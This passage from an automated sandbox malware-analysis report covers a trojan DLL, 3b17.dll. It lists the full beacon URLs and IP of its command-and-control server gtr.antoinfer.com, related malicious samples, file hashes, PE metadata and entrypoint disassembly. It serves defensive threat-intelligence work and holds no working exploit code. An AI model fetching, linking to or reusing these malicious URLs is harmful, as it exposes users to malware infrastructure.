http://gtr.antoinfer.com/LQ0ImNchzaabH7Vdh_/2FtRScd2v/QQzFkXdgAhow_2FcWrEP/n3sYFzsTbYVS3adrQdv/5Nzc_2BoRJpkAsHtAz6xV3/PsE8tlG0HHtLJ/T5TqRkda/BLQo9v_2FZTJ_2FPNHoYsv1/ye7M3znq3j/msHJ000mSBJHPb7nZ/E46dHTxH_2B4/eeBIrQKxL9Y/THDXKoks2pteky/rz_2F_2F0HzAFdHANfOc3/VtFiNo945_2BUObZ/oZuZG5t2mblYFyG/ygnFakJ2W33SNUuycB/j7wv4YZIa/0Hblow_2BZFOik2zX2YB/PXGpfOrjekSAdA19ARh/ahTrlQtp6MFSLYtpjwx_2B/D_2FHvRt	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gtr.antoinfer.com	165.232.183.49	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://gtr.antoinfer.com/favicon.ico	true	Avira URL Cloud: safe	unknown
http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO	true	Avira URL Cloud: safe	unknown
http://gtr.antoinfer.com/J7P_2BuFqD/6ho97HFr4RP0mXM5H/ZrJ1_2BByY5Q/ab42fK_2F4S/vR5_2FWZ9gdHVf/hFgLjlRclm4jOH5T1Dh_2/Bb6OfmnpAwg0WKei/TGgUW067tNixzOx/BwPRLezaId9OtwPQlY/CkLoMrcdP/aOG78DSC7_2BjhPI9iFK/iN8ZMV2kpmYpR22nO5N/DPr4nIGLY40kIrg97zu5zK/lZpfj5ONzqtKf/Vl33ZktQ/u9goArPbUAC5CGM3eIqnvuS/s_2BLl3UAj/4ev_2F316DIi43v_2/FeCwH6Boab2B/JVucmKuDRDu/1ldPV7QmrKfn1O/3tEgr34mvlOov5etr8LcR/vS5_2Fy	true	Avira URL Cloud: safe	unknown
http://gtr.antoinfer.com/LQ0ImNchzaabH7Vdh_/2FtRScd2v/QQzFkXdgAhow_2FcWrEP/n3sYFzsTbYVS3adrQdv/5Nzc_2BoRJpkAsHtAz6xV3/PsE8tlG0HHtLJ/T5TqRkda/BLQo9v_2FZTJ_2FPNHoYsv1/ye7M3znq3j/msHJ000mSBJHPb7nZ/E46dHTxH_2B4/eeBIrQKxL9Y/THDXKoks2pteky/rz_2F_2F0HzAFdHANfOc3/VtFiNo945_2BUObZ/oZuZG5t2mblYFyG/ygnFakJ2W33SNUuycB/j7wv4YZIa/0Hblow_2BZFOik2zX2YB/PXGpfOrjekSAdA19ARh/ahTrlQtp6MFSLYtpjwx_2B/D_2FHvRt	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/B	rundll32.exe, 00000003.00000002.471774654.000000000087B000.00000004.00000020.sdmp, {24032658-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr, ~DFDEC152A471305B20.TMP.24.dr	false	Avira URL Cloud: safe	unknown
http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6	~DFF4A7B0CDF51E1130.TMP.24.dr, {2403265A-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr	false	Avira URL Cloud: safe	unknown
http://gtr.antoinfer.com/IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_	rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC	loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
165.232.183.49	gtr.antoinfer.com	United States		22255	ALLEGHENYHEALTHNETWORKUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	444315
Start date:	05.07.2021
Start time:	16:50:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	3b17.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.winDLL@18/8@6/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 10.9% (good quality ratio 10.3%) Quality average: 79.3% Quality standard deviation: 29%
HCA Information:	Successful, ratio: 69% Number of executed functions: 58 Number of non-executed functions: 127
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.4.86, 173.222.108.210, 173.222.108.226, 40.126.31.139, 40.126.31.4, 40.126.31.8, 40.126.31.143, 40.126.31.137, 20.190.159.136, 40.126.31.135, 20.190.159.132, 20.50.102.62, 20.82.210.154, 23.203.80.193, 80.67.82.235, 80.67.82.211 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, login.msa.msidentity.com, e11290.dspg.akamaiedge.net, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, go.microsoft.com.edgekey.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/444315/sample/3b17.dll

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
165.232.183.49	9b9dc.dll	Get hash	malicious	Browse	gtr.antoinfer.com/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
gtr.antoinfer.com	9b9dc.dll	Get hash	malicious	Browse	165.232.183.49

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ALLEGHENYHEALTHNETWORKUS	9b9dc.dll	Get hash	malicious	Browse	165.232.183.49
	sMpor4yDdu.exe	Get hash	malicious	Browse	165.232.177.150
	WesYhOA67u.exe	Get hash	malicious	Browse	165.232.177.148
	06LzL8skNz.exe	Get hash	malicious	Browse	165.232.183.193
	Jt8zMQzDO2.exe	Get hash	malicious	Browse	165.232.183.193
	WCPcSoW6ZI.exe	Get hash	malicious	Browse	165.232.184.56
	VD4V1nD2qq.exe	Get hash	malicious	Browse	165.232.184.56
	PDFXCview.exe	Get hash	malicious	Browse	165.232.56.100
	Quote.exe	Get hash	malicious	Browse	165.232.56.241
	SyfoFC5d21.exe	Get hash	malicious	Browse	165.232.110.48
	RNM56670112.exe	Get hash	malicious	Browse	165.232.36.60
	RRUY44091239.exe	Get hash	malicious	Browse	165.232.36.60
	http://165.232.53.33/chrgoo/index.html	Get hash	malicious	Browse	165.232.53.33
	exploit.doc	Get hash	malicious	Browse	165.232.122.138
	Information_1598546901.doc	Get hash	malicious	Browse	165.232.71.161
	Important_1598548213.doc	Get hash	malicious	Browse	165.232.71.161
	Information_1598546966.doc	Get hash	malicious	Browse	165.232.71.161
	Important_1598548221[540].doc	Get hash	malicious	Browse	165.232.71.161

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{24032656-DDEC-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	33448
Entropy (8bit):	1.9157082965419407
Encrypted:	false
SSDEEP:	192:rxZ2Z62NLWst1Yf8txdM7J7DJZ/4WWjiQLMMnsQL3:r3y5NiY1mYx+7J7DJZ/4WiiQL5nsQL3
MD5:	3928A30DF03768803E774801C3F4E561
SHA1:	AF25581F03824CBF0A6EBFED628C1E8E39AC8A2A
SHA-256:	156FB623D241F07C64B078E4AC5A1A6DA3D1F0CBF12B52A6ADA2AA9C59733691
SHA-512:	0AB27C29FE614E23B521507B10B353A71930786B1419297BBECA36B347AD62ED7D71736B65992F3BEA9DFAEB9D0E561A0D5926183546AA31D4428663ECD816D9
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{24032658-DDEC-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	24844
Entropy (8bit):	1.7646611420791007
Encrypted:	false
SSDEEP:	48:Iw4GcprBGwpaQG4pQoGrapbSyZGQpB1oGHHpc16aTGUp81UGzYpm1yGOGopLnytS:rMZbQQ62BSyzjp2IqWmMX+tw2Wldrgkg
MD5:	29FD5C1C69C7FC7F8CA99BE1A73BBF11
SHA1:	9BFD2294C0CF68C65F03227C23080967B33497D2
SHA-256:	C7BF1096E4F9835AC4CE120913AAE7DAA62E3B0A22551E8D2F6F17F6C20CC74D
SHA-512:	39131C8A41616DA3A2662C0A3FC1EA00D4858B76274646F9AABB63EA04BFC9CE0C93317638A534D273C41479A1AF79D7BDED5E7ECD8495B932A2A02D57A172BC
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{2403265A-DDEC-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	24844
Entropy (8bit):	1.767594786399834
Encrypted:	false
SSDEEP:	96:rsZzQr6dBShzjN28qWkMd+tLyTPXoIwcg:rsZzQr6dkhzjN28qWkMd+tLG4Iwcg
MD5:	95B02B154963EB5617DE99433FDF03F5
SHA1:	893E930D4040A1453A034979F3E718726C97AC97
SHA-256:	5E24B25EB859E4C5BA40C3929D5E3DAF8CA21DE8875E0757ABA18432D4CADB00
SHA-512:	B272E54BB1660B5811590BC124F3E7A00C71CBB0EC3A1AD30D5FAF00BEFB9921A7602223BCE22557EEB717017F00D478E51320A495DEE179B5B7ACB078FB0C00
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\_2FjZKD[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	236270
Entropy (8bit):	5.999802763577416
Encrypted:	false
SSDEEP:	6144:i/d/ybCg2dciObr8mv4iQRV9JGAO/KZpAeXoIXQUkuySbN:i/3+UHiQyPKPPgZabN
MD5:	9B70C50AD598C9590F179E69C851569A
SHA1:	1221CCA6F041E66E10C09D1188801EE0B6AC2B20
SHA-256:	7D13B1A54AB1861868E01CF63FE17AA99A27AD4CD014F7BBB48ACD74891C9B73
SHA-512:	5D521E3D1B265F7219DFC9C30DE5FEF12617959D930951039B322E1559D7341E30744C63A8856649B7E943B1B0B259EFF97DD03415085E6361A6F70389563FDB
Malicious:	false
Preview:	TE1yNAiDENMvRkfTtJNHHLbRqSBFOVJbFHkoIN2s7erFkjUlkXUXyBVfxuRKFnxMtxog5Y/jGBeFAWDnv3ogB/9zTR9YvGdpEtU/hJDrocOKawBeX1uS22LY+R0xM0eQC4q2AJJyYfWk9hy3WeJqpVJGwO7HC+xp3JXzMXu6tKLHcs70pIQpQH2HITUnXMRDFVHTkX7is16v7QnHj3D62A/1BJ/Qq6gsPzy6gssfMWsv4qOb/VCjukO1qStDzJOeQOWEGSpSD8FLK01KeyzMh7wBWZczkokAMh/CfRddE0ulXSooR/YwH4T2gljzoNoBBG3BKLINZPJhUcizoN4d39B8sYC7c8TOXYFISS52QmUHhlocEqs5tUJi4E7P8XUE7aly8kdF5rtx558GEaBPK7B1CiVwoEBJUWl0uYO3XM4S9sBIesP8nIFRn5Ynz3j8g4KosF7yksd54eit0/GGccGoKD2xUTzXPQKSGTRwT4sRQFiHOJpyX26xJO9xjjYVXPgrqO9mv80padi5MVSiRz3dITExwYCB8uqVJE1W1oiE3eNZRWQxXfa6KQQ5h6ID6mJj2AC5ckHfjvbEfkGyyPd43c7/UjspbfQaJqYovxAEoEQZMVufoxzzMbu00eHTKdgUB6kDlQmucin+Zd4V8nCub6uoKnZ1O5hQQSAJFVezCKRnzyMrP4dTDkPWR6PFeF6cK/sqeav4ugI028IR0rEeUmHtY2a40k5oE4fvxWgojI1DmNJt30uS9jY6+CCiRxrigd6XQ88930CBpSyKpV6T+E1z0hq8vwSEDlgVa9cTsorMAPDi87hHRtVYWF173METchOAUO1RJv/2pK7f6KqsgBEWZPVKwzFF0u6ginmnMnty4Pii4dZOv52gzlh4cFFZKTzoElQ2TMXEtHE43ewu9h/JtYCkbn4vYruwslxvMSiX7YLftg9JFtGq3BdudX3y4WnZx5bECrdrMjsZlsq9nFoz/vz67xG1v9+F

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BaWO[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	258240
Entropy (8bit):	5.999817357934779
Encrypted:	false
SSDEEP:	6144:i/d/ybCg2dciObr8mv4iQRV9JGAO/KZpAeXoIXQUkuySb39kC:i/3+UHiQyPKPPgZabtF
MD5:	DFB6898B5C07756E927BC079F55B7EF7
SHA1:	4972812015301D42C9E890801EA36BA4C7838AEB
SHA-256:	46BF96945DD89AD3C83CF46973B6CD50E48C2F7C004443C99A3AE81FA0722AA4
SHA-512:	F49798EACD58002F08F9056CB5B80D3FFFFCAB40F11914D64285603C0FB0D959898C46881C878D0B3DC8C60E4DBE017AAA50F2F0C9F92F7A216BED8D2D7241CF
Malicious:	false
IE Cache URL:	http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO
Preview:	TE1yNAiDENMvRkfTtJNHHLbRqSBFOVJbFHkoIN2s7erFkjUlkXUXyBVfxuRKFnxMtxog5Y/jGBeFAWDnv3ogB/9zTR9YvGdpEtU/hJDrocOKawBeX1uS22LY+R0xM0eQC4q2AJJyYfWk9hy3WeJqpVJGwO7HC+xp3JXzMXu6tKLHcs70pIQpQH2HITUnXMRDFVHTkX7is16v7QnHj3D62A/1BJ/Qq6gsPzy6gssfMWsv4qOb/VCjukO1qStDzJOeQOWEGSpSD8FLK01KeyzMh7wBWZczkokAMh/CfRddE0ulXSooR/YwH4T2gljzoNoBBG3BKLINZPJhUcizoN4d39B8sYC7c8TOXYFISS52QmUHhlocEqs5tUJi4E7P8XUE7aly8kdF5rtx558GEaBPK7B1CiVwoEBJUWl0uYO3XM4S9sBIesP8nIFRn5Ynz3j8g4KosF7yksd54eit0/GGccGoKD2xUTzXPQKSGTRwT4sRQFiHOJpyX26xJO9xjjYVXPgrqO9mv80padi5MVSiRz3dITExwYCB8uqVJE1W1oiE3eNZRWQxXfa6KQQ5h6ID6mJj2AC5ckHfjvbEfkGyyPd43c7/UjspbfQaJqYovxAEoEQZMVufoxzzMbu00eHTKdgUB6kDlQmucin+Zd4V8nCub6uoKnZ1O5hQQSAJFVezCKRnzyMrP4dTDkPWR6PFeF6cK/sqeav4ugI028IR0rEeUmHtY2a40k5oE4fvxWgojI1DmNJt30uS9jY6+CCiRxrigd6XQ88930CBpSyKpV6T+E1z0hq8vwSEDlgVa9cTsorMAPDi87hHRtVYWF173METchOAUO1RJv/2pK7f6KqsgBEWZPVKwzFF0u6ginmnMnty4Pii4dZOv52gzlh4cFFZKTzoElQ2TMXEtHE43ewu9h/JtYCkbn4vYruwslxvMSiX7YLftg9JFtGq3BdudX3y4WnZx5bECrdrMjsZlsq9nFoz/vz67xG1v9+F

C:\Users\user\AppData\Local\Temp\~DF411F8F60C26A5FE3.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13141
Entropy (8bit):	0.5397612142950505
Encrypted:	false
SSDEEP:	48:kBqoIESEMEjJGBAJGjrLfGjrdGn+JGjrdGBE:kBqoIb9ZXHL+HAfHA2
MD5:	C459193FAA74EC923EDD2AEE7869BF97
SHA1:	33532D83C18FF5424850FE6A291EA2C1BF074C11
SHA-256:	8489A8C19C851490538B90EB97FD817191EE9E0BE42D5A14136A2388B615DDF4
SHA-512:	DA69F632F055ADDE01D8B51BD3A9C8F971500DA9B1B922E300B23F0954F1D0105AA2EF97F89D0E54B2151B5BC0566152A24525CDE3C9E963257637370FB04DCB
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFDEC152A471305B20.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	35037
Entropy (8bit):	0.46882852126003777
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+1T1t1f1W1yI1yBnytcaRZXExaDldr3cb/:kBqoxKAuvScS+9DhAjOw2Wldrg/
MD5:	C7AB3144DBD6F31E51B6BA3D6775A9E3
SHA1:	E4FF20612654765E51E5AE6D15C598DE2781EBEC
SHA-256:	E03D537B7D47DDE288AA5E0E258DFC2AEEB0B830B0C681D59978373FC5508208
SHA-512:	73B7B6C79A95DAC22283F34D0752815F67B8A9F6C6A289B69E370B1E7F5D363A4B6D1B46956DC3BF931608CBC2AE8A47678A5DCA2689A70532EF965550AA43BE
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF4A7B0CDF51E1130.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	35037
Entropy (8bit):	0.4698005102135692
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+/hDqOIOB4UlC/Rxj1dXoIkKe+yyOc:kBqoxKAuvScS+/hDqxQLyTPXoIwc
MD5:	32DFB7B6A629E0708D86B3606A57C577
SHA1:	57557B3CA0F8AD2AFAF689A9535B418E215D9F5C
SHA-256:	AE85778291C2C6AF1A4C3600B3DDB892563F750499854ADD500C2889AEF15694
SHA-512:	76DF9433D1F2CAA2B16601B5CC0B07603265D0699056E618CEC2E360144C47EC807A3B47125905EE495937B32484AFF94F328F4DA954F84D13FFD4D378DD561D
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.74420793959966
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3b17.dll
File size:	621568
MD5:	3b17fcc55cee8cbe4cd1b443f358c36d
SHA1:	45d1e652f282a94b37ac32afb62ff563afb2fb39
SHA256:	9ae13bdb906bf774982242a378a20fb25da3e29dd7b5e1acd2531562319edba6
SHA512:	6b299214396c3ea94d01f7211ffed949f4e615c12586d2191b633c12f6d7d2881c01bc2d1b360bf05d15b58c604104e222d7f33297e63c067144de4bf2c5c337
SSDEEP:	12288:DDq7QuHqfYJvHfikOqXr/nQKDEaQVOjTHCmjem/s9IoxAZgv6Hqip969aqnugCSh:/evfijqLvDEJYTiOem/i6lH69/2e6c
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{..\..H\..H\..H.r.IW..H.r.I...H.r.IN..H.k.IS..H.k.IO..H.k.I}..HUbIHM..H\..H...H.h.I]..H.h.I]..H.h%H]..H.h.I]..HRich\..H.......

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x104dfd0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60CB68D7 [Thu Jun 17 15:23:03 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	3618a66a29eac020b8f3ecc6a1cb392b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F2508D69687h
call 00007F2508D69A18h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F2508D6952Ah
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push 00000000h
call dword ptr [01122160h]
push dword ptr [ebp+08h]
call dword ptr [0112215Ch]
push C0000409h
call dword ptr [01122164h]
push eax
call dword ptr [01122168h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call 00007F2508DA28CCh
test eax, eax
je 00007F2508D69687h
push 00000002h
pop ecx
int 29h
mov dword ptr [0108C920h], eax
mov dword ptr [0108C91Ch], ecx
mov dword ptr [0108C918h], edx
mov dword ptr [0108C914h], ebx
mov dword ptr [0108C910h], esi
mov dword ptr [0108C90Ch], edi
mov word ptr [0108C938h], ss
mov word ptr [0108C92Ch], cs
mov word ptr [0108C908h], ds
mov word ptr [0108C904h], es
mov word ptr [0108C900h], fs
mov word ptr [0108C8FCh], gs
pushfd
pop dword ptr [0108C930h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0108C924h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0108C928h], eax

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x8abd0	0x7e	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1222a4	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12c000	0xe68	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12d000	0x2af4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x91d4	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9228	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x122000	0x29c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x89c4e	0x89e00	False	0.646934142679	data	6.66431498915	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x8b000	0x96854	0x1a00	False	0.563551682692	data	5.65671037078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x122000	0x1108	0x1200	False	0.428602430556	data	5.38081725829	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids	0x124000	0x71f7	0x7200	False	0.745922423246	data	5.77791689152	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12c000	0xe68	0x1000	False	0.340087890625	data	3.21593318356	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12d000	0x2af4	0x2c00	False	0.792702414773	data	6.66891196238	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0x12c250	0xf0	data	English	United States
RT_DIALOG	0x12c340	0xe8	data	English	United States
RT_DIALOG	0x12c428	0xcc	data	English	United States
RT_DIALOG	0x12c4f8	0xc4	data	English	United States
RT_DIALOG	0x12c5c0	0x140	data	English	United States
RT_DIALOG	0x12c700	0xec	data	English	United States
RT_DIALOG	0x12c7f0	0x142	data	English	United States
RT_DIALOG	0x12c938	0x120	data	English	United States
RT_DIALOG	0x12ca58	0x144	data	English	United States
RT_DIALOG	0x12cba0	0x144	data	English	United States
RT_MANIFEST	0x12cce8	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	GetStdHandle, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, ReadFile, ReadConsoleW, GetFileType, CreateFileW, CloseHandle, WriteConsoleW, GetSystemTimeAsFileTime, GetWindowsDirectoryA, GetSystemDirectoryA, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetStringTypeW, GetProcessHeap, GetTempPathA, VirtualProtect, GetCurrentDirectoryA, SetSystemPowerState, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, 